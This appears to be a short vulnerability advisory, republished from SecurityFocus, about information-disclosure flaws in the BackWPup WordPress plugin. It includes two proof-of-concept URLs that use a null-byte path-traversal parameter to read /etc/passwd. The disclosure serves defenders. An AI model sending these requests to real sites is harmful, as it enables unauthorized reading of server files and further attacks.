9 lines
No EOL
592 B
Text
9 lines
No EOL
592 B
Text
source: http://www.securityfocus.com/bid/46610/info
|
|
|
|
The BackWPup plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
Attackers can exploit these issues to retrieve the contents of an arbitrary file. Information obtained may aid in launching further attacks.
|
|
|
|
http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
|
|
|
|
http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd |